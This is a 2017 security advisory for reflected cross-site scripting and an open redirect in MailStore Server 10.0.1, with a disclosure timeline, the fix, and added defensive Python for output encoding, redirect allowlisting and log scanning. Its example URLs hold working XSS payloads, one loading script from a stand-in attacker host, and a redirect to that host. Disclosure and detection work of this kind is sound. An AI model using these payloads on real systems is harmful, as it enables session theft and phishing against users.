MailStore 10.0.1 Cross Site Scripting / Open Redirect

Published: 2017.02.02
Credit: Tobias Glemser
Risk: Medium
CWE: CWE-79, CWE-601
CVE: N/A
Local: No
Remote: Yes

secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server

Affected Products
MailStore Server Version 10.0.1.12148 was tested.
According to the vendor:
- MailStore 9.2 to 10.0.1 is affected by the Reflected XSS vulnerability
- MailStore 9.0 to 10.0.1 is affected by the Open Redirect vulnerability

References
https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
CWE-79 https://cwe.mitre.org/data/definitions/79.html
CWE-601 https://cwe.mitre.org/data/definitions/601.html

Summary:
"MailStore Server is one of the world's leading solutions for email archiving,
management and compliance for small and medium-sized businesses."

The built-in web application does not properly validate untrusted input in
several parameters. This leads to both reflected Cross-Site Scripting (XSS)
and an Open Redirect.

Effect:
To exploit the reflected XSS, the victim has to be authenticated to the
MailStore web application. If the victim clicks a link sent by an attacker,
the attacker could, for example, copy the victim's session ID to his own data sink.

By sending another link with a crafted URL, the attacker could redirect the
victim to a malicious website, while the link itself points to the trusted
MailStore address. For this, the victim is not required to be authenticated.
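The two defects above map to two missing server-side controls: contextual output encoding for the reflected search values (CWE-79) and a destination check on the derefer endpoint (CWE-601). The following Python is an added illustration of both controls, not MailStore's code or the vendor's fix; the host list, the base URL and the function names are assumptions made for the example.

```python
# Added example (not MailStore's code): the two server-side checks whose
# absence produces the reflected XSS and the open redirect described above.
from html import escape
from urllib.parse import urljoin, urlsplit

# Hosts the application may redirect to. Constructed for the example;
# a real deployment would derive this from its own configured address.
TRUSTED_HOSTS = {"www.example.com:8462"}

SEARCH_FIELDS = ("c-q", "c-f", "c-from", "c-to")


def render_search_echo(params: dict) -> str:
    """Reflect the search parameters back into an HTML text context.

    Every value is HTML-escaped, so a payload such as
    '</script><img src=x onerror=alert(0)>' is rendered as inert text.
    (If a value were reflected inside a <script> block instead, a
    JavaScript-string/JSON encoding would be the right control, not this one.)
    """
    rows = []
    for name in SEARCH_FIELDS:
        value = params.get(name, "")
        rows.append(f"<li>{escape(name)}: {escape(value, quote=True)}</li>")
    return "<ul>" + "".join(rows) + "</ul>"


def safe_redirect_target(url: str, base: str = "https://www.example.com:8462/") -> str:
    """Resolve the 'url' parameter of a derefer-style endpoint and refuse any
    destination outside the trusted host.

    Resolving against the base first normalises relative paths, while absolute
    and protocol-relative ('//host') inputs keep their own host, which the
    allowlist check then rejects. Non-HTTP schemes are rejected as well.
    Returns the resolved target when allowed, otherwise the base URL.
    """
    resolved = urljoin(base, url)
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return base
    if parts.netloc not in TRUSTED_HOSTS:
        return base
    return resolved


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's parameter names.
    print(render_search_echo({"c-q": "test", "c-f": "x</script><img src=x onerror=alert(0)>"}))
    print(safe_redirect_target("http://www.boeserangreifer.de"))
    print(safe_redirect_target("/a/10.0.1.12148/"))
```

The redirect check deliberately compares the full `netloc` (host and port) rather than a prefix match, so that a destination such as a host merely starting with the trusted name is not accepted.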

Vulnerable scripts, reflected XSS (authenticated users):
/search-result/, parameters c-f, c-q, c-from and c-to
/message/ajax/send/, parameter recipient

Vulnerable script, Open Redirect:
/derefer/, parameter url

Example for reflected XSS:
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
# Load external JS code
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E

Example for Open Redirect:
https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de
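Until the update is applied, the parameter names and paths listed above are enough to spot exploitation attempts in web-server access logs. The following Python is an added example, not part of the advisory: it parses constructed Combined-Log-Format lines and flags requests to the affected scripts whose parameters carry markup, or whose derefer target points off the trusted host. The log lines, the trusted host and the function names are assumptions made for the example.

```python
# Added example (not from the advisory): flag requests matching the two
# MailStore vulnerability patterns in constructed access-log lines.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters reflected by the affected scripts, taken from the advisory.
XSS_PARAMS = {"c-f", "c-q", "c-from", "c-to", "recipient"}
XSS_PATHS = ("/search-result/", "/message/ajax/send/")
REDIRECT_PATH = "/derefer/"

# Host of the MailStore instance itself (constructed for the example).
TRUSTED_HOSTS = {"www.example.com:8462"}

# Markup or inline-event-handler fragments that have no business in a search term.
MARKUP = re.compile(r"<\s*/?\s*(script|img|svg|iframe|body|object|embed)\b|\bon\w+\s*=", re.I)

# Combined/Common Log Format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)


def classify_request(path: str):
    """Return (finding, detail) for a request path, or None if it looks benign."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %XX once
    if parts.path.endswith(XSS_PATHS):
        for name in XSS_PARAMS:
            for value in qs.get(name, []):
                # unquote again so a double-encoded payload is still caught
                if MARKUP.search(unquote(value)):
                    return ("reflected-xss", name)
    if parts.path.endswith(REDIRECT_PATH):
        for value in qs.get("url", []):
            target = urlsplit(unquote(value))
            # Absolute and protocol-relative targets carry a netloc; relative
            # paths stay on the trusted host and are not flagged.
            if target.netloc and target.netloc not in TRUSTED_HOSTS:
                return ("open-redirect", target.netloc)
    return None


def scan_log(lines):
    """Yield (ip, timestamp, finding, detail) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than guess
        result = classify_request(m.group("path"))
        if result:
            findings.append((m.group("ip"), m.group("ts")) + result)
    return findings


# Constructed sample lines: two XSS attempts, one open-redirect attempt, one benign search.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Feb/2017:10:00:00 +0100] "GET /a/10.0.1.12148/search-result/'
    '?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E HTTP/1.1" 200 4321',
    '10.0.0.5 - - [02/Feb/2017:10:00:05 +0100] "GET /a/10.0.1.12148/search-result/'
    '?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E HTTP/1.1" 200 4321',
    '10.0.0.7 - - [02/Feb/2017:10:01:00 +0100] "GET /a/10.0.1.12148/derefer/'
    '?url=http%3a%2f%2fwww.boeserangreifer.de HTTP/1.1" 302 0',
    '10.0.0.9 - - [02/Feb/2017:10:02:00 +0100] "GET /a/10.0.1.12148/search-result/'
    '?c-q=invoice&c-from=alice HTTP/1.1" 200 4321',
    '10.0.0.9 - - [02/Feb/2017:10:02:30 +0100] "GET /a/10.0.1.12148/derefer/'
    '?url=%2Fa%2F10.0.1.12148%2F HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded parameter value rather than the raw query string is what makes the check robust to the percent-encoding variations seen in the examples above; the same logic can be pointed at a WAF or proxy log as long as the request path is preserved.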

Solution:
Update to Version 10.0.2

Disclosure Timeline:
2017/01/09 vendor contacted
2017/01/10 initial vendor response asking for technical details
2017/01/10 provided vendor with the advisory including technical details
2017/01/13 vendor provided information about affected versions and mitigation
2017/01/18 update published by vendor
2017/01/31 public disclosure

Credits:
Tobias Glemser
tglemser@secuvera.de
secuvera GmbH
https://www.secuvera.de

Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore secuvera shall
not be liable for any direct or indirect damages that might be
caused by using this information.

Copyright 2017, cxsecurity.com